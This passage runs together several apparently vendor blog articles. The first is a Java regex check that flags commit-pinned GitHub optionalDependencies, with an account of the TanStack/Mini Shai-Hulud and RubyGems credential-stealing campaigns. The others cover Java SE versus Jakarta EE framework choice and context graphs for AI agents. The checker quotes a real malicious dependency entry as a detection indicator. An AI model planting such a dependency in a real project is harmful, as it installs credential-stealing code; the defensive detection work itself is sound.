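import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/** Flags optionalDependencies that point at a Git commit rather than a registry version. */
class OptionalDependencyCheck {

    // Captures the body of the "optionalDependencies" object (assumes no nested objects).
    private static final Pattern BLOCK =
            Pattern.compile("\"optionalDependencies\"\\s*:\\s*\\{([^}]*)\\}");

    // Matches "name": "github:owner/repo#<40 hex chars>" inside that body.
    private static final Pattern GIT_PINNED =
            Pattern.compile("\"([^\"]+)\"\\s*:\\s*\"(github:[^\"#]+#[0-9a-f]{40})\"");

    /** Returns "name -> specifier" for every commit-pinned GitHub optional dependency. */
    static List<String> findSuspicious(String packageJson) {
        List<String> hits = new ArrayList<>();
        Matcher block = BLOCK.matcher(packageJson);
        while (block.find()) {
            Matcher entry = GIT_PINNED.matcher(block.group(1));
            while (entry.find()) {
                hits.add(entry.group(1) + " -> " + entry.group(2));
            }
        }
        return hits;
    }

    public static void main(String[] args) {
        // "example-package" is a made-up name; the dependency entry is the one quoted above.
        String manifest = """
            {
              "name": "example-package",
              "optionalDependencies": {
                "@tanstack/setup": "github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c"
              }
            }
            """;
        findSuspicious(manifest).forEach(System.out::println);
    }
}
```

In practice a check like this would run against lockfiles and SBOM data as well, since the manifest of a transitive dependency is rarely inspected by hand.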
The TanStack attack wasn't alone. On the same day, RubyGems was hit by a separate campaign with 120+ malicious packages uploading SSH keys, API tokens and credentials on install. The incident demonstrated that Mini Shai-Hulud was no longer an npm-only threat but an ecosystem-level supply-chain worm capable of moving laterally across package registries and CI/CD trust boundaries.
RubyGems temporarily suspended new account registrations after hundreds of malicious gems were uploaded through automated bot accounts in a coordinated supply-chain attack. Researchers observed that many of the malicious gems contained credential-stealing functionality targeting developer machines, CI/CD pipelines and cloud environments similar to the npm or PyPI campaigns. Unlike the TanStack compromise where attackers weaponized trusted publishing infrastructure, the RubyGems wave appeared more focused on large-scale registry flooding and ecosystem poisoning using automated account creation and stolen credentials.
The npm and PyPI attack was precise with a worm spreading quietly through stolen tokens, targeting specific maintainers with valid provenance to avoid detection. The RubyGems attack was blunt with mass account creation, bulk uploads, live exploits and stolen credentials routed to ransomware groups within hours. However, both incidents followed the common principle of compromising developer infrastructure, stealing secrets and expanding propagation into additional software ecosystems. Two different attack methods, same motive.
Mini Shai-Hulud proves that perimeter defenses fail when attackers exploit trusted pipelines and developer tools. To mitigate such ecosystem compromises, organizations must integrate secure coding, hardened releases and continuous software monitoring. The following mitigation steps should be followed:
According to Harness’s analysis of the npm attacks, organizations should treat CI/CD pipelines as critical security infrastructure, combining SBOM visibility, policy enforcement, provenance validation and automated dependency risk analysis to prevent trusted publishing systems from becoming malware distribution channels.
Harness SCS helps you quickly detect and contain compromised dependencies like the TanStack package before they impact your pipelines. With real-time visibility into your SBOMs and dependency graph, you can identify affected versions, trace their usage across builds and environments and block them using OPA policies. This ensures malicious packages never propagate through your CI/CD or AI workflows.
Harness SCS enables instant search across all repositories and artifacts to quickly identify if compromised package versions exist in your environment. The moment such a malicious package is disclosed, you can pinpoint its presence and assess impact across your entire supply chain in seconds.

Harness AI streamlines response to incidents like the TanStack compromise through simple natural-language prompts. With a single prompt, you can generate OPA policies that block affected versions of a package such as TanStack across all pipelines, preventing malicious packages from entering builds or deployments. As new compromised versions emerge, these policies can be quickly updated to maintain strong preventive controls across your SDLC. SCS customers can use this OPA policy to detect and block the affected versions.
Harness SCS automatically detects compromised versions across both production and non-production environments. Teams can track remediation, assign fixes and monitor progress through to deployment, ensuring exposed credentials and vulnerable dependencies are addressed quickly. This end-to-end visibility helps contain the impact and prevents compromised packages from persisting in your supply chain.

The Mini Shai-Hulud worm highlights how quickly a malicious package can expose high-value secrets when embedded deep within registries and CI runners. Because those systems manage dependencies and packages across projects, the impact extends beyond code to API keys, prompt data and downstream systems, often bypassing traditional security checks.
Defending against such attacks requires more than reactive fixes. Teams need real-time visibility into dependencies, the ability to enforce policies to block compromised versions and continuous tracking to ensure remediation is complete across all environments. Harness SCS enables teams to quickly identify where affected package versions are used, prevent them from entering new builds and ensure fixes are consistently rolled out.
With these controls in place, organizations can limit credential exposure, contain threats early and secure their supply chain against attacks like the TanStack compromise.


When you're architecting an enterprise Java application, one decision quietly shapes everything downstream: runtime footprint, deployment pipelines, and how your platform team handles incidents at 3 a.m. For two decades, that decision was framed as Java SE vs Java EE. In 2026, that framing has quietly inverted.
Nearly every modern enterprise Java app runs on Java SE 21 or 25 LTS. The real choice now sits one layer up: which framework or runtime sits on top of the JVM. Spring Boot. Quarkus. Helidon. Micronaut. Vanilla Jakarta EE on Open Liberty, Payara, or WildFly. These options have converged on the same underlying APIs. Spring Boot 3 and 4 sit on jakarta.* packages, the same namespace Jakarta EE itself uses. But they differ sharply in startup time, memory footprint, deployment topology, and what your CI/CD pipeline has to do to ship them safely.
This guide is for the platform engineer, architect, or staff engineer who needs to make that call once and live with it across dozens of services. We'll cover what changed, where the stacks still diverge, and how to standardize delivery across a mixed Java fleet without forcing consolidation no team wants.
Java SE (Standard Edition) is the foundation of every Java application, from a five-line script to a globally distributed system. It's the language, the runtime, and the core libraries every Java program assumes is there.
But describing Java SE as just "the foundation" undersells what's happened to it in the last three years. Java SE in 2026 is not the Java SE of 2018.
At its core, Java SE includes:
These pieces form the runtime baseline that every Java framework, including Spring Boot, Quarkus, and Jakarta EE implementations, sits on top of.
If you've been away from the platform for a few years, four changes are worth knowing about before you make any architectural decisions:
Virtual threads (stable in Java 21). Project Loom collapsed the cost of a thread from megabytes of stack to a few hundred bytes. A single JVM can now run millions of concurrent virtual threads. This is the biggest concurrency change in Java's history and it removes the main argument for reactive frameworks like WebFlux on most workloads. Blocking code is fast again.
AOT compilation and native images. GraalVM native image and the JDK's own ahead-of-time caching turn Java apps into binaries that start in tens of milliseconds and use a fraction of the memory of a warm JVM. This used to be a Quarkus or Micronaut differentiator. It's now table stakes across the ecosystem, including Spring Boot 3+.
Records, sealed classes, and pattern matching. The boilerplate that used to push teams toward Lombok or Kotlin is mostly gone. Data-oriented programming in modern Java looks closer to Scala or Kotlin than to Java 8.
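Java 25 LTS performance work. Compact object headers, a product feature in Java 25 that is enabled with -XX:+UseCompactObjectHeaders, shrink each object header to 8 bytes on 64-bit JVMs; the JEP reports roughly 22% less heap usage on one heap-heavy benchmark. The G1 garbage collector got a redesigned card table in Java 26 that delivers measurable throughput gains on reference-heavy code.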
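Two of these changes are easiest to appreciate in code. The sketch below assumes Java 21 or later; the PaymentEvent domain and all class names are made up for illustration. It models events as a sealed hierarchy of records, handles them with an exhaustive pattern-matching switch, and runs plain blocking code on one virtual thread per task.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.Future;

class ModernJavaSketch {

    // A sealed hierarchy of records: the compiler knows every permitted subtype.
    sealed interface PaymentEvent permits Authorized, Declined {}
    record Authorized(String orderId, long amountCents) implements PaymentEvent {}
    record Declined(String orderId, String reason) implements PaymentEvent {}

    // Exhaustive switch with record patterns; no default branch is required.
    static String describe(PaymentEvent event) {
        return switch (event) {
            case Authorized(String orderId, long amountCents) ->
                    orderId + " authorized for " + amountCents + " cents";
            case Declined(String orderId, String reason) ->
                    orderId + " declined: " + reason;
        };
    }

    // Ordinary blocking code, scheduled on one virtual thread per task.
    static List<String> describeAll(List<PaymentEvent> events) {
        try (ExecutorService executor = Executors.newVirtualThreadPerTaskExecutor()) {
            List<Future<String>> futures = new ArrayList<>();
            for (PaymentEvent event : events) {
                futures.add(executor.submit(() -> {
                    Thread.sleep(10); // stands in for a blocking I/O call
                    return describe(event);
                }));
            }
            List<String> results = new ArrayList<>();
            for (Future<String> future : futures) {
                results.add(future.get());
            }
            return results;
        } catch (InterruptedException | ExecutionException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        List<PaymentEvent> events = List.of(
                new Authorized("order-1", 1250),
                new Declined("order-2", "insufficient funds"));
        describeAll(events).forEach(System.out::println);
    }
}
```

Adding a third record to the permits clause without a matching case makes the switch fail to compile, which is the safety net that used to require a visitor or a code generator.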
Plain Java SE is honest about its scope. It does not give you:
You can build all of these by hand. Almost no one does. In practice, "I'm using Java SE" in 2026 means "I'm using Java SE plus a framework that supplies the missing pieces." That framework is the actual decision, which is where the rest of this guide focuses.
Jakarta EE is the modern successor to Java EE, the standardized set of APIs and specifications for building enterprise-scale Java applications. If you wrote enterprise Java between 2000 and 2017, you wrote Java EE. Everything since 2018 is Jakarta EE.
The name change wasn't cosmetic. It came with a migration that every Java team upgrading in 2026 still has to plan for.
Oracle transferred Java EE to the Eclipse Foundation in 2017. The platform was renamed Jakarta EE because Oracle retained the "Java" trademark. Java EE 8 (2017) was the last release under the old name. Jakarta EE 8 (2019) was the same platform under new governance.
Then came the breaking change. Starting with Jakarta EE 9 (2020), every Jakarta EE API package was renamed from javax.* to jakarta.*. An import that used to read import javax.persistence.Entity now reads import jakarta.persistence.Entity. Packages that belong to Java SE itself, such as javax.sql and javax.crypto, kept their names. The change was mechanical, but it touched nearly every file in every Jakarta EE codebase, and it forced every framework that depended on those APIs to publish a major-version break.
This is why Spring Boot 3 (late 2022) was a hard upgrade. Spring Boot 3 dropped javax.* and adopted jakarta.*. Any Spring Boot 2.x application moving to 3.x or 4.x has to migrate the namespace. Tools like Eclipse Transformer and OpenRewrite automate most of it, but the migration is still the gating event for many platform upgrades happening in 2026.
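To make "mechanical" concrete, here is a minimal sketch of the rewrite rule. It is an illustration only, not how Eclipse Transformer or OpenRewrite work internally: the class name is hypothetical and the list of migrated roots is a deliberately small subset. The point it shows is that the rename applies to enterprise API packages, while javax.* packages that belong to Java SE must be left alone.

```java
import java.util.regex.Pattern;

class NamespaceMigrationSketch {

    // Illustrative subset of API roots that moved to jakarta.*; a real migration covers many more.
    private static final Pattern MIGRATED = Pattern.compile(
            "\\bjavax\\.(persistence|servlet|ws\\.rs|inject|validation|enterprise)\\b");

    /** Rewrites javax.* references for the listed roots and leaves everything else untouched. */
    static String migrate(String source) {
        return MIGRATED.matcher(source).replaceAll("jakarta.$1");
    }

    public static void main(String[] args) {
        System.out.println(migrate("import javax.persistence.Entity;"));
        // Java SE packages such as javax.sql are not part of the rename.
        System.out.println(migrate("import javax.sql.DataSource;"));
    }
}
```

A text-level rule like this misses string literals in configuration files, service descriptors, and bytecode in third-party jars, which is why teams reach for the dedicated tools.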
Jakarta EE 11, released in 2025, is the current stable platform. Jakarta EE 12 is in development. The headline specifications most teams interact with are:
If you're a Spring developer, several of these will look familiar. That's not coincidence. Spring's annotations and patterns shaped Jakarta EE's modernization, and Jakarta EE's specifications now define the underlying APIs Spring builds on. The two ecosystems converged.
A common objection to Jakarta EE is that it's too heavy for microservices. Jakarta EE 10 answered this directly with the Core Profile: a minimal subset of specifications (CDI Lite, JAX-RS, JSON-P, JSON-B, Annotations, Interceptors, Dependency Injection) explicitly designed for lightweight cloud-native runtimes and AOT compilation.
The Core Profile is what runtimes like Quarkus implement when they want Jakarta EE compatibility without the full platform's footprint. It's the answer to "Jakarta EE doesn't fit in a container." It does. The original critique was about WebSphere and WebLogic, not about Jakarta EE the specification.
In 2026, picking Jakarta EE doesn't mean picking a multi-gigabyte application server. The runtimes teams actually choose are:
The legacy "heavyweight Java EE" stereotype belongs to WebSphere full profile and WebLogic. Those are real products with real footprints, but in 2026 they're an active migration target, not a forward choice for new development.

Figure: Modern enterprise Java is a layered stack. Frameworks and runtimes pick their packaging and opinions, but they all sit on the same jakarta.* API surface and the same JVM.
By this point in the article, the framing should be obvious: Spring Boot, Quarkus, Helidon, Micronaut, and vanilla Jakarta EE on Open Liberty or Payara are not five different platforms. They're five different opinions sitting on the same jakarta.* APIs and the same JVM. So how do teams actually decide?
In practice, four signals do most of the work.
Signal 1: What does the rest of your fleet run?
The single biggest predictor of which stack a new service uses is which stack the team's other services already use. This is not laziness. It's a sound platform decision. Two services on the same framework share build tooling, base container images, observability libraries, configuration patterns, deployment templates, and on-call runbooks. A team running 40 Spring Boot services will pay a real operational tax to introduce a Quarkus service, even if Quarkus is technically the better fit for that one workload.
The exception is when the new workload has a specific profile that the existing stack genuinely can't serve well. A Spring Boot shop building one event-driven function that needs to scale to zero on AWS Lambda has a legitimate reason to reach for Quarkus or a native Spring Boot image. A Jakarta EE shop building one async data-processing service has a legitimate reason to reach for Spring Boot's mature integration ecosystem. The decision rule is not "best tool for the job in isolation," it's "best tool given what we already operate."
Signal 2: What's the deployment target?
The deployment target matters more than most architecture discussions admit. Three patterns dominate:
Signal 3: What's the team's reactive vs imperative bias?
Five years ago, this was a religious debate. Virtual threads have mostly settled it for new code. But existing services that are already reactive don't get a free migration, and teams that have built fluency with Project Reactor, RxJava, or Mutiny will keep getting value from those investments.
The practical guidance:
Signal 4: How much governance do you need?
This is the question that quietly distinguishes Jakarta EE from Spring Boot in regulated environments. Jakarta EE is a specification with multiple compatible implementations. A regulated bank or insurer can require "any Jakarta EE 11 compatible runtime" in a procurement document and have meaningful vendor portability. Spring Boot is a single implementation, governed by Broadcom (which acquired VMware in 2023). That's fine for most teams. It's a real consideration for organizations with compliance requirements around vendor lock-in.
Quarkus, Helidon, and Open Liberty all sit on the Jakarta EE side of this line because they implement Jakarta EE specifications. Spring Boot does not, despite using jakarta.* packages. The distinction matters less than it used to, but it has not gone away.
The takeaway
The convergence at the API layer means most teams can pick any of these stacks and ship perfectly good software. The choice is no longer a technology bet. It's a fit-to-fleet, fit-to-deployment-target, and fit-to-governance-model decision. The teams that get this wrong are the ones still litigating it as a technology choice.
Stack choice does not end at deployment. It shapes how your services emit telemetry, how incidents propagate, and how quickly your platform team can pin down the root cause when something breaks at 2 a.m. The convergence story makes parts of this easier (shared APIs mean shared observability standards) and parts of it harder (mixed fleets mean more surface area for incidents to hide in).
Three operational realities worth thinking through.
The 2026 platform team rarely operates a single-framework fleet. Most enterprise Java estates look like this: a long tail of Spring Boot services, a growing edge of Quarkus or native-compiled services for cold-start-sensitive workloads, and a stable core of older Jakarta EE applications running on Open Liberty, Payara, or WildFly. Sometimes a few WebLogic or WebSphere systems are still in active modernization.
This mix is fine. It reflects real organizational decisions made over time. But it means your reliability strategy cannot assume framework homogeneity. Health endpoint conventions, log formats, metric names, and tracing instrumentation differ across these stacks unless you actively unify them. The teams that struggle most with incident response are the ones who let each service team pick its own conventions.
OpenTelemetry has become the cross-stack standard for traces, metrics, and logs in enterprise Java. Spring Boot, Quarkus, Helidon, Micronaut, and most Jakarta EE runtimes all ship with OpenTelemetry instrumentation either built-in or one dependency away. This is genuinely good news for platform teams.
The catch: standardization at the protocol layer does not give you standardization at the convention layer. Two services emitting OpenTelemetry traces can still tag spans with completely different attribute names. Two services emitting metrics can still use different naming conventions for the same operation. AI SRE platforms perform best when the signals they ingest are semantically consistent. That consistency is a platform-engineering decision, not a framework decision.
The practical guidance: pick a single OpenTelemetry semantic convention (the OTel HTTP and database conventions are reasonable defaults) and enforce it across stacks through your shared observability libraries. The framework choice does not matter as much as whether you've made the convention choice at all.
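One way a shared observability library can enforce that choice is to normalize attribute names before export. The sketch below is an assumption-laden illustration: the class is hypothetical, it uses plain maps rather than the OpenTelemetry SDK, and the three mappings reflect renames from older HTTP attribute names to the stable HTTP semantic conventions. Check them against the convention version your SDK targets.

```java
import java.util.LinkedHashMap;
import java.util.Map;

class SpanAttributeNormalizer {

    // Older HTTP attribute names mapped to their stable semantic-convention names.
    private static final Map<String, String> CANONICAL = Map.of(
            "http.method", "http.request.method",
            "http.status_code", "http.response.status_code",
            "http.url", "url.full");

    /** Returns a copy of the attributes with known legacy keys renamed; other keys pass through. */
    static Map<String, Object> normalize(Map<String, ?> attributes) {
        Map<String, Object> normalized = new LinkedHashMap<>();
        attributes.forEach((key, value) ->
                normalized.put(CANONICAL.getOrDefault(key, key), value));
        return normalized;
    }

    public static void main(String[] args) {
        Map<String, Object> legacy = new LinkedHashMap<>();
        legacy.put("http.method", "GET");
        legacy.put("http.status_code", 200);
        legacy.put("service.tier", "edge"); // hypothetical custom attribute, left as-is
        System.out.println(normalize(legacy));
    }
}
```

Keeping the mapping in one shared library means a Spring Boot service and a Quarkus service end up with the same attribute names without either team having to remember the rule.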
A typical Spring Boot service on the JVM takes 2 to 5 seconds to start, hits steady-state CPU and memory after another 30 to 60 seconds of JIT warmup, and produces meaningful traces and metrics throughout. A Quarkus native binary starts in under 100 milliseconds and reaches steady state immediately. These are different operational profiles. They produce different incident patterns.
Spring Boot deployments tend to fail visibly during startup or warmup. Native deployments tend to fail at build time or never. Spring Boot scaling events are slower and more forgiving. Native scaling events are faster but more brittle when something is wrong with the binary itself. AI SRE platforms detect anomalies based on baselines, and your baselines should reflect the runtime profile of the service being monitored. A 3-second startup that is normal for a JVM service is a critical anomaly for a native service.
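The baseline point can be reduced to a few lines. In this sketch the class and enum names are hypothetical, and the ceilings are hard-coded from the ranges quoted above purely for illustration; a real platform would learn a baseline per service rather than per runtime type.

```java
import java.time.Duration;

class StartupBaseline {

    enum RuntimeProfile {
        JVM(Duration.ofSeconds(5)),      // upper end of the 2 to 5 second range
        NATIVE(Duration.ofMillis(100));  // "under 100 milliseconds"

        final Duration expectedCeiling;

        RuntimeProfile(Duration expectedCeiling) {
            this.expectedCeiling = expectedCeiling;
        }
    }

    /** A startup is anomalous when it exceeds the ceiling for that service's runtime profile. */
    static boolean isAnomalous(RuntimeProfile profile, Duration observedStartup) {
        return observedStartup.compareTo(profile.expectedCeiling) > 0;
    }

    public static void main(String[] args) {
        Duration threeSeconds = Duration.ofSeconds(3);
        System.out.println("JVM, 3s anomalous: " + isAnomalous(RuntimeProfile.JVM, threeSeconds));
        System.out.println("Native, 3s anomalous: " + isAnomalous(RuntimeProfile.NATIVE, threeSeconds));
    }
}
```

The same observation produces opposite verdicts depending on the profile, which is why a single fleet-wide threshold misleads in a mixed fleet.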
This is where AI SRE platforms like Harness AI SRE become operationally meaningful. In a single-framework fleet, a senior SRE can mostly hold the operational model in their head. In a mixed fleet of 50 to 500 services across Spring Boot, Quarkus, and legacy Jakarta EE, no human can. The questions AI SRE answers well are exactly the questions mixed-fleet teams ask:
These questions are tractable for AI when the underlying telemetry is consistent. They are intractable for humans regardless of telemetry quality. That's the operational case for treating AI SRE as platform infrastructure rather than as a tool individual teams adopt.
The framework choice shapes the data. The platform decision is what you do with it.
See how Harness AI SRE correlates incidents across mixed Java fleets.
The honest answer to "which Java stack should we use" depends on what you're building, what you already operate, and what your deployment target looks like. The matrix below is opinionated and concrete. Use it as a starting point, not a final answer.
Choose when:
Avoid when:
Current version baseline: Spring Boot 4.0 (released late 2025), running on Java 21 or 25 LTS. Spring Boot 3.x remains a reasonable choice for teams not ready to upgrade Spring Framework to 7.
Choose when:
Avoid when:
Choose when:
Avoid when:
Choose when:
Avoid when:
Choose when:
Avoid when:
Neither of these is a forward choice in 2026. Both are real products with real production footprints, but new development on them is rare outside very specific enterprise circumstances. If you're running WebSphere full profile or WebLogic, the relevant question is the modernization path: typically Open Liberty (the IBM-supported migration target from WebSphere) or Helidon and WildFly (common WebLogic migration targets).
If you've read this far and the matrix still feels like five reasonable options, default to one of two answers:
For everything else, the matrix above is a tiebreaker. The decision rule that beats every other rule is: pick the framework your platform team can operate well at 2 a.m.
The article has been pushing toward one conclusion: in 2026, most enterprise Java estates are mixed-framework by design, and the platform team's job is to make that mix operable rather than to force consolidation.
What that looks like concretely:
A Spring Boot core handles the long tail of CRUD services and customer-facing APIs. A handful of Quarkus or native Spring Boot services sit at the edges where cold start matters: serverless functions, event handlers, scale-to-zero workloads. A stable set of Jakarta EE applications on Open Liberty or Payara handles the deeply-integrated systems that have been running reliably for years and would cost more to rewrite than to maintain. Java 21 is the floor across all of it, with a planned migration to Java 25 LTS over the next 12 to 18 months.
This is not an architectural compromise. It is the correct answer for organizations that have grown over time and have services with genuinely different operational profiles. The mistake is treating the mix as a problem to solve rather than an environment to operate.
When a team proposes adding a new service to the fleet, four questions separate good decisions from defaults:
These questions matter more than any framework comparison because they're the questions a senior platform engineer asks before writing the first line of code. The frameworks themselves have converged enough that the operational fit dominates the technical fit.
The four questions at the end of the previous section all point at the same operational problem. A platform team running a mixed-framework Java fleet faces the same delivery bottleneck regardless of which frameworks are in the mix: ticket-ops and pipeline sprawl that compound with every new service.
The frameworks have converged. The pipelines have not. Most enterprise Java teams still operate one CI/CD configuration for Spring Boot, a different one for Quarkus, a third for Jakarta EE on Open Liberty or Payara, and a long tail of bespoke automation for whatever legacy systems are still in flight. Every new service adds operational surface area. Every framework upgrade creates a coordination problem.
This is the layer where AI-powered continuous delivery and GitOps practices stop being aspirational and become structural. Pull-based deployments through GitOps eliminate the manual approval steps that previously gated Spring Boot rollouts but not Quarkus ones. Policy as Code guardrails enforce the same release strategies, security requirements, and resource limits across every framework in the fleet. Automated verification catches deployment anomalies against each service's own baseline, whether that baseline is a 3-second JVM startup or a 50-millisecond native cold start. Intelligent rollbacks protect production without requiring on-call engineers to remember which framework needs which recovery playbook.
The platform decision is no longer which Java framework to standardize on. It's how to operate the mix you already have without paying a coordination tax on every change.
Java SE is the language, JVM, and core libraries every Java application runs on. Jakarta EE is a set of standardized APIs (CDI, Jakarta Persistence, Jakarta REST, Servlet, Jakarta Data, and others) that extend Java SE for enterprise applications. In 2026, the choice is rarely between Java SE and Jakarta EE directly. It's between frameworks and runtimes (Spring Boot, Quarkus, Helidon, Micronaut, Open Liberty, Payara, WildFly) that all sit on Java SE and most of which implement or interoperate with the Jakarta EE specifications.
Jakarta EE is the direct successor to Java EE under new governance at the Eclipse Foundation. Oracle transferred Java EE to Eclipse in 2017 and the platform was renamed because Oracle retained the "Java" trademark. Java EE 8 (2017) was the last release under the old name. Jakarta EE 8 (2019) was the same platform under the new name. Jakarta EE 11 (2025) is the current stable version.
Starting with Jakarta EE 9 in 2020, every Jakarta EE package was renamed from javax.* to jakarta.*. An import that used to read import javax.persistence.Entity now reads import jakarta.persistence.Entity. Spring Boot 3 (late 2022) and Spring Boot 4 both require the new namespace, which means any Spring Boot 2.x application upgrading to 3.x has to migrate every affected import. Tools like Eclipse Transformer and OpenRewrite automate most of the migration, but it remains the gating event for many platform upgrades happening in 2026.
For most greenfield services, Spring Boot is the path of least resistance because of its ecosystem and hiring advantages. Choose a Jakarta EE runtime like Quarkus when cold start time and memory footprint are your dominant operational costs, when you need native compilation as a first-class concern, or when procurement requires multi-vendor specification compatibility. The technical capabilities have largely converged. The decision is mostly about ecosystem fit, deployment target, and what your platform team already operates well.
On the JVM, a typical Spring Boot service starts in 2 to 5 seconds and runs in 200 to 400 MB, while a Quarkus service starts closer to 1 second and runs in 150 to 250 MB. As GraalVM native binaries, both Spring Boot (via Spring AOT) and Quarkus start in 30 to 100 milliseconds and run in 30 to 80 MB. The real performance difference shows up in cold-start-sensitive deployments like serverless and scale-to-zero workloads, where native compilation moves from a nice-to-have to a requirement.
Java 21 LTS is the production baseline for most enterprise Java fleets, and Java 25 LTS (released September 2025) is what platform teams are migrating to over the next 12 to 18 months. Java 17 should be treated as the floor, not the target. Avoid non-LTS releases (currently Java 26) for production unless you have a specific reason to track preview features, since support windows for non-LTS versions are six months. Both Spring Boot 4 and Jakarta EE 11 support Java 21 with first-class enhancements when running on Java 25.
Yes, and most enterprise Java fleets do exactly this. The technical compatibility is straightforward because both stacks produce standard container images and both expose health, metrics, and logs through OpenTelemetry-compatible instrumentation. The harder problem is operational consistency: enforcing the same release strategies, observability conventions, and governance policies across both stacks. Policy-as-code and unified delivery pipelines solve this regardless of which frameworks are in the mix.
Java EE under that name ended in 2017, but the platform is alive and actively developed under the Jakarta EE name at the Eclipse Foundation. Jakarta EE 11 shipped in 2025 with new specifications including Jakarta Data and first-class virtual thread support. Modern runtimes like Quarkus, Helidon, Open Liberty, Payara, and WildFly implement Jakarta EE specifications in cloud-native form. The "Java EE is dead" narrative was specifically about heavyweight application servers like WebLogic and WebSphere full profile, which are an active migration target rather than a forward choice.
Experience AI-powered continuous delivery and native GitOps with Harness


Engineers have been shipping pieces of "the graph" for years. Service maps. Dependency graphs. Knowledge graphs. RDF triples. The newest entrant is the context graph, and the reason it shows up now is specific: software is increasingly executed by agents, and agents need a model of how work actually happens, not just an index of what exists.
This post is a practical, vendor-neutral walkthrough of context graphs: what they are, what separates them from a knowledge graph, the components you'll end up building, and the pitfalls that bite teams who try to ship one. I'll be drawing on engineering writing from Glean and Harness where they've published useful frames, but the design decisions apply regardless of stack.
A knowledge graph answers questions about state. What services exist. Which team owns which repo. Which ticket is linked to which incident. The graph is a snapshot of relationships at a point in time.
A context graph answers a different question. How does work flow through this organization? When a P1 fires, what sequence of actions usually resolves it? When a deal moves from "pilot created" to "closed-won," what steps are between those states, who runs them, and how long do they take? When a service hits an error rate threshold, what's the typical path from alert to mitigation?
The Glean engineering team puts it concisely: "what" exists vs. "how" change happens. Their model treats actions as first-class nodes in the graph, with edges encoding causality and correlation. Other formulations exist, but the central idea is consistent across them.
Most production designs end up with a layered architecture, even if teams don't always name the layers the same way:
Layer 1: knowledge graph. Entities and the static relationships between them. Service A depends on service B. User U owns repo R. Ticket T is linked to incident I. This is the substrate. Without it, you don't know that "ACME Inc" in your CRM and "Acme" in support are the same customer, and any aggregate analysis turns to mush.
Layer 2: personal graph (or activity stream). A per-user temporal sequence of actions: viewed doc, edited file, commented on PR, joined channel, deployed service. The signals are noisy on their own. Real work is messy. People context-switch constantly, reuse the same document across efforts, and abandon threads only to pick them back up days later. The job at this layer is to stitch raw events into coherent units of work.
Layer 3: context graph. Aggregate, anonymized patterns derived from many personal graphs. This is where you get statements like "P1 incidents in this product area resolve in 30 minutes 80% of the time and almost always pass through these four steps." It is a probabilistic model of organizational process, not a static workflow definition.
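One simple way to picture the step from Layer 2 to Layer 3 is a first-order transition model: count how often one action follows another across many traces, then normalize the counts into probabilities. This is a sketch of that one idea, not how any particular product builds its graph. The class name and action labels are hypothetical, and it assumes the traces have already been stitched into units of work and anonymized.

```java
import java.util.List;
import java.util.Map;
import java.util.TreeMap;

class TransitionModel {

    /** Counts action-to-action transitions across traces and normalizes each row to probabilities. */
    static Map<String, Map<String, Double>> fit(List<List<String>> traces) {
        Map<String, Map<String, Integer>> counts = new TreeMap<>();
        for (List<String> trace : traces) {
            for (int i = 0; i + 1 < trace.size(); i++) {
                counts.computeIfAbsent(trace.get(i), k -> new TreeMap<>())
                      .merge(trace.get(i + 1), 1, Integer::sum);
            }
        }
        Map<String, Map<String, Double>> probabilities = new TreeMap<>();
        counts.forEach((from, row) -> {
            int total = row.values().stream().mapToInt(Integer::intValue).sum();
            Map<String, Double> normalized = new TreeMap<>();
            row.forEach((to, n) -> normalized.put(to, n.doubleValue() / total));
            probabilities.put(from, normalized);
        });
        return probabilities;
    }

    public static void main(String[] args) {
        // Five made-up incident traces: four end in a rollback, one in an escalation.
        List<List<String>> traces = List.of(
                List.of("alert", "ack", "rollback"),
                List.of("alert", "ack", "rollback"),
                List.of("alert", "ack", "rollback"),
                List.of("alert", "ack", "rollback"),
                List.of("alert", "ack", "escalate"));
        fit(traces).forEach((from, row) -> System.out.println(from + " -> " + row));
    }
}
```

A production model would also carry timing, entity types, and confidence, but even this shape makes the contrast with a static workflow definition clear: the paths are learned from what people did, not declared up front.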
Another way to look at the same architecture: a context graph is two intertwined graphs operating over the same entities. One is structural — nodes and edges representing the static relationships in your organization. The other is executional — transitions and actions that move those entities through their lifecycle over time. The context graph emerges from their combination. Neither graph alone is sufficient: the structural one tells you what could be touched in a given situation, the executional one tells you what actually gets touched, and only the intersection produces a model that's useful to an agent. The three layers above are one way to slice this; the structural/executional split is another, and they map onto each other cleanly. Layer 1 is mostly structural, Layer 2 is mostly executional, and Layer 3 is where the two are joined under a shared semantic frame.
Sitting under all three is a semantic layer that defines what each thing actually means: an "incident" in the graph maps to a specific schema, with specific attributes and lifecycle states, regardless of which tool emitted the event. Without this, you're shoveling JSON between systems and hoping the LLM figures it out.
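A small sketch of what that mapping can look like in code. Everything here is hypothetical: the tool names ("pager", "ticketing"), the payload field names, and the three lifecycle states are invented for illustration. What matters is the shape: each tool-specific event is translated into one canonical Incident type before it enters the graph.

```java
import java.util.Map;

class SemanticLayerSketch {

    enum IncidentState { OPEN, ACKNOWLEDGED, RESOLVED }

    // The canonical schema every tool-specific event is mapped onto.
    record Incident(String id, String severity, IncidentState state) {}

    /** Translates a tool-specific payload into the canonical Incident. */
    static Incident fromToolEvent(String tool, Map<String, String> payload) {
        return switch (tool) {
            case "pager" -> new Incident(
                    payload.get("incident_id"), payload.get("priority"),
                    pagerState(payload.get("status")));
            case "ticketing" -> new Incident(
                    payload.get("key"), payload.get("sev"),
                    ticketState(payload.get("workflow")));
            default -> throw new IllegalArgumentException("Unmapped tool: " + tool);
        };
    }

    private static IncidentState pagerState(String status) {
        return switch (status) {
            case "triggered" -> IncidentState.OPEN;
            case "acknowledged" -> IncidentState.ACKNOWLEDGED;
            case "resolved" -> IncidentState.RESOLVED;
            default -> throw new IllegalArgumentException("Unknown pager status: " + status);
        };
    }

    private static IncidentState ticketState(String workflow) {
        return switch (workflow) {
            case "To Do" -> IncidentState.OPEN;
            case "In Progress" -> IncidentState.ACKNOWLEDGED;
            case "Done" -> IncidentState.RESOLVED;
            default -> throw new IllegalArgumentException("Unknown ticket workflow: " + workflow);
        };
    }

    public static void main(String[] args) {
        System.out.println(fromToolEvent("pager",
                Map.of("incident_id", "INC-1", "priority", "P1", "status", "triggered")));
        System.out.println(fromToolEvent("ticketing",
                Map.of("key", "INC-1", "sev", "P1", "workflow", "To Do")));
    }
}
```

Both calls yield the same Incident value, so downstream aggregation does not need to know which tool reported the event.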

